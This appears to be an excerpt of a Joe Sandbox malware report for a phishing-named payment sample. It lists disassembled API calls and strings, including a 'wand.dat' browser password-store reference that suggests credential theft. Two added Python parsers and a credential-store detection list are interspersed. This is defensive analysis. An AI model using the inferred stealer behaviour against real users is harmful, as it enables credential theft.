• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
• Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
• Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
• Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
• Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
• memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
• Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
• Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
APIs
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
• Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
• Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
• Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
• Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
• Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• virtual tables may not be altered, xrefs: 0042EBD2
• sqlite_altertab_%s, xrefs: 0042EC4C
• Cannot add a column to a view, xrefs: 0042EBE8
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
• Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
• Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
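The records above print every call argument as raw hex (or "?" where the plugin could not recover it), so the two things an analyst actually wants from the file-mapping record, the section protection passed to CreateFileMappingW and the access mask passed to MapViewOfFile, have to be decoded by hand. The following Python is an added example (it is not part of the Joe Sandbox report and not code from the analysed sample) that parses "APIs" and "Strings" lines in the format used on this page and decodes those two arguments with the Windows SDK constants (PAGE_* for flProtect, FILE_MAP_* for dwDesiredAccess). The embedded sample input is copied from the CreateFileMappingW/MapViewOfFile record and the SQLite-strings record above; everything else (function and type names, the decoder table) is this example's own. Two caveats the listing itself imposes: the hFile argument of CreateFileMappingW is "?", so the record alone does not say whether the section is file-backed or pagefile-backed; and the plugin prints more positional values than a function takes (memcpy appears with up to fifteen), so the decoder only reads the parameter index it knows and ignores the rest. The three strings are SQLite's own error and format strings from its ALTER TABLE code, i.e. a statically linked SQLite inside the unpacked payload, which fits the browser-data harvesting flagged in the report overview.

```python
"""Parse Joe Sandbox 'APIs' / 'Strings' listing lines and decode the
kernel32 flag arguments that the report prints only as raw hex.
Added example; not part of the report or of the analysed sample."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: lines copied from two records of this report
# (the CreateFileMappingW/MapViewOfFile block and the SQLite strings block).
SAMPLE = """\
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• virtual tables may not be altered, xrefs: 0042EBD2
• sqlite_altertab_%s, xrefs: 0042EC4C
• Cannot add a column to a view, xrefs: 0042EBE8
"""

# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)][,] ref: XXXXXXXX"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# "• some text, xrefs: XXXXXXXX"
STR_RE = re.compile(r"^\s*•\s*(?P<text>.*?),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # int for recovered hex values, None for "?"
    ref: int                    # address of the call site
    caller: Optional[int]       # set for "Part of subcall function" lines


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16)         # also handles negatives such as "-00000030"


def parse_report(text: str) -> Tuple[List[ApiCall], List[Tuple[str, int]]]:
    """Collect API call lines and string xref lines from report text."""
    calls, strings = [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [parse_arg(a) for a in raw.split(",")] if raw else []
            caller = m.group("caller")
            calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                 int(m.group("ref"), 16),
                                 int(caller, 16) if caller else None))
            continue
        m = STR_RE.match(line)
        if m:
            strings.append((m.group("text"), int(m.group("ref"), 16)))
    return calls, strings


# Windows SDK constants (winnt.h / memoryapi.h).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
SEC_FLAGS = {0x1000000: "SEC_IMAGE", 0x4000000: "SEC_RESERVE",
             0x8000000: "SEC_COMMIT", 0x10000000: "SEC_NOCACHE"}
FILE_MAP_FLAGS = {0x01: "FILE_MAP_COPY", 0x02: "FILE_MAP_WRITE",
                  0x04: "FILE_MAP_READ", 0x20: "FILE_MAP_EXECUTE"}


def decode_bits(value: int, table: dict) -> str:
    """Render a bitmask as NAME|NAME, keeping unknown bits as hex."""
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def decode_protect(value: int) -> str:
    """flProtect: one PAGE_* value in the low byte plus optional SEC_* bits."""
    page = PAGE_PROTECT.get(value & 0xFF, hex(value & 0xFF))
    sec = decode_bits(value & ~0xFF, SEC_FLAGS)
    return page if sec == "0" else f"{page}|{sec}"


# (API name, 0-based parameter index) -> (parameter name, decoder).
# Only these indices are read; trailing values printed by the plugin beyond
# the real prototype are ignored.
ARG_DECODERS = {
    ("CreateFileMappingW", 2): ("flProtect", decode_protect),
    ("MapViewOfFile", 1): ("dwDesiredAccess", lambda v: decode_bits(v, FILE_MAP_FLAGS)),
}


def decode_call(call: ApiCall) -> Optional[str]:
    """Return 'param=SYMBOLIC' when the flag argument was recovered, else None
    (unknown API, or the argument was printed as '?')."""
    for (name, idx), (param, fn) in ARG_DECODERS.items():
        if call.name == name and idx < len(call.args) and call.args[idx] is not None:
            return f"{param}={fn(call.args[idx])}"
    return None


if __name__ == "__main__":
    calls, strings = parse_report(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {c.name}.{c.module} {decode_call(c) or ''}")
    for text, ref in strings:
        print(f"{ref:08X} string {text!r}")
```

Run against the sample, the file-mapping record decodes to flProtect=PAGE_READWRITE and dwDesiredAccess=FILE_MAP_WRITE|FILE_MAP_READ, i.e. a read/write view of an unnamed section (lpName is 00000000). Feeding the parser the whole "APIs" portion of a report gives a call table keyed by call-site address that can be diffed against a second sample's report without relying on the proprietary fuzzy hashes.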
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                                          • API String ID: 2618321458-1828844352
• Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
• Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
• Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
• Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
• wcslen.MSVCRT ref: 00410C74
• _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
• _wcsicmp.MSVCRT ref: 00410CCE
• _wcsicmp.MSVCRT ref: 00410CDF
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
• Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
• Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
• Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
• Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
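The per-function records in this report (hash lines, then `APIs`, `Memory Dump Source`, `Similarity`) are tedious to triage by eye once an export runs to thousands of lines. The following Python is an added example, not Joe Sandbox's own code and not part of the original report: it parses that record layout as inferred from the lines above, separates the calls a function makes itself from those listed as "Part of subcall function", splits the `$`-joined `String ID` back into the function's strings, and flags records whose strings name a browser credential file. The embedded sample is an abridged copy of the `wand.dat` record and the `ShellExecuteW` record above; the assumption that `wand.dat` is the Opera browser's legacy password store is the editor's, not a statement from the report.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: two records abridged from the report above, with the
# page indentation and the 'Download File' link residue removed.
SAMPLE = """\
• Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
• Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Similarity
• String ID:
• API String ID: 3550944819-0
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

API_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-F]{8}): )?"  # call made inside a callee
    r"(\S+?)\.([A-Z0-9]+)"                             # api.MODULE
    r"(?:\((.*)\),)?"                                  # optional (args),
    r" ref: ([0-9A-F]{8})$"                            # call-site address
)


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # call-site address as printed by the report
    subcall_of: Optional[str] = None  # callee address when listed as a subcall
    args: str = ""


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    instruction_id: str = ""
    source: str = ""                  # memory dump the function was lifted from
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    closed: bool = False              # 'API String ID' is the last line of a record


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("• "):
            line = line[2:].strip()
        if not line:
            continue
        if current is None or current.closed:
            current = FunctionRecord()
            records.append(current)
        if line in SECTION_HEADERS:
            section = line
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Opcode ID":
            current.opcode_id = value
        elif key == "Instruction ID":
            current.instruction_id = value
        elif key == "Source File":
            current.source = value.split(",")[0]
        elif key == "String ID":
            # Similarity joins the function's strings with '$'; empty means none.
            current.strings = [s for s in value.split("$") if s]
        elif key == "API String ID":
            current.closed = True
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(name=m.group(2), module=m.group(3),
                                            ref=m.group(5), subcall_of=m.group(1),
                                            args=m.group(4) or ""))
    return records


def direct_calls(rec: FunctionRecord) -> List[tuple]:
    """(call-site, API) pairs the function makes itself; subcalls excluded."""
    return [(a.ref, a.name) for a in rec.apis if a.subcall_of is None]


# Assumption (editor's, not the report's): wand.dat is Opera's legacy password
# store, so a function pairing it with a '*.*' wildcard is a credential-theft hint.
CREDENTIAL_STORES = {"wand.dat"}


def credential_store_hits(records: List[FunctionRecord]) -> List[tuple]:
    hits = []
    for rec in records:
        files = [s for s in rec.strings if s.lower() in CREDENTIAL_STORES]
        if files:
            hits.append((rec.instruction_id or rec.opcode_id, files,
                         sorted({a.name for a in rec.apis})))
    return hits
```

Run it against a full text export of the report and the `wand.dat` record is the only hit in this section; the `direct_calls` split is what makes the ShellExecuteW record readable, since the `open` verb is reached through a helper at 0040A116 rather than by the function itself.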
                                                                                                                                                                                                                                          • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$free
                                                                                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                                          • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                                          • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                                          • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
